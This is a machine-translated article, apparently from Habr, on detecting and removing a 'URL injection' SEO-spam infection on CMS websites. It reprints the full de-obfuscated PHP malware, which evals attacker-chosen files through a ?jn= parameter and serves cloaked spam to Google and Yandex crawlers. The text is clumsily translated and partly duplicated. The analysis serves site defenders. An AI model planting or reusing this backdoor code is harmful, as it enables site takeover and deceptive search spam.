Implementation via URL: www.site.ru/?jn=xxxxxxxx
Just recently, I encountered a new (*?) Version of the spam virus for websites. Google defines it as "URL injection."
There are links on your site that did not exist and could not be - for example, you clearly know the structure of the site and the original URL, which differs from the “left” URL. In particular, the following links appear in the index of search engines:
Yandex Webmaster does not respond to them yet, but in Google’s tools for webmasters a warning is issued about a possible hacking of the site. There are also recommendations for the search. Unfortunately, they are quite common and specific search problems takes time. Antiviruses and online site analyzers do not give any results. Only pens.
The full code (neobfustsirovannogo) malicious code under the cut.
The options are most likely 3:
')
Description
There are links on your site that did not exist and could not be - for example, you clearly know the structure of the site and the original URL, which differs from the “left” URL. In particular, the following links appear in the index of search engines:
www.site.ru/?jn=xxxxxxxx
Search and elimination
Yandex Webmaster does not respond to them yet, but in Google’s tools for webmasters a warning is issued about a possible hacking of the site. There are also recommendations for the search. Unfortunately, they are quite common and specific search problems takes time. Antiviruses and online site analyzers do not give any results. Only pens.
Option A: Code not obfustsirovan
- We are looking for in the source who and how we use the variable $ _GET ['jn']
- Next on the code we see who shits where (for example: \ js \ swfupload \ plugins \ jquery \)
Option B: Code Obfuscated
- We are looking for a directory with files whose names come after "? Jn ="
- We are looking for suspicious executable files such as images / c0nfv.php
- You can do a search for paths where there may be files a la "/img/icon/thumb/jquery.php"
- Check CMS Config Date Modified
- It is recommended to check for the presence (correctness) of the base.php files - this is the body of the virus itself, the code is obfuscated
- We check the date jquery.php and compare it with the date of detection of the virus by monitoring the tools of Google webmasters.
Is encountered
- CMS: Joomla, WordPress, DLE, PrestaShop, HostCMS
- Plugins: ImageZoomer, SWFupload, BlockCategories
- There is a high probability of occurrence in almost all plug-ins that use jQuery and in those places where admins have not got the handle to the settings.
The full code (neobfustsirovannogo) malicious code under the cut.
<?php if(isset($_GET['jn'])){ini_set/**/(strrev("gnitroper_rorre"),0);include "images/c0nfv.php";$uhvuusgp=str_replace('..','',$_GET[$qjkx]);if(is_file($ftdavmbe.'/'.$uhvuusgp)){header('Content-Type: text/html; charset=windows-1251',false);echo eval/**/('?>'.join("",file($ftdavmbe."/$uhvuusgp")).'<?');die;}}if(preg_match("/(yandex|google)/i", $_SERVER['HTTP_USER_AGENT'])){ini_set/**/(strrev("gnitroper_rorre"),0);include "images/c0nfv.php";if(is_file($ftdavmbe."/db.php")){include $ftdavmbe."/db.php";$jxbecpzx=preg_replace("/[0]*$/","", preg_replace("/\.*/","",(string)sprintf('%f', hexdec(sha1($_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'])))));$iwtcrjis=substr($jxbecpzx,20,3);if(substr($iwtcrjis,0,1)==0){do{$x++;$iwtcrjis=substr($jxbecpzx,20+$x,3);}while(substr($iwtcrjis,0,1)==0);}include $ftdavmbe."/".$iwtcrjisy[$iwtcrjis];echo mb_convert_encoding($ohjjpibn[72], 'UTF-8', 'Windows-1251');}}?> Causes of hacking
The options are most likely 3:
')
- Open to write directory on the server;
- Vulnerability in the software that runs on the site, as a rule, these are free CMS (content management systems). For example, if you are using an outdated and insecure version;
- Hacking third-party plug-ins on the site (working with JQUERY).
Source: https://habr.com/ru/post/246353/
All Articles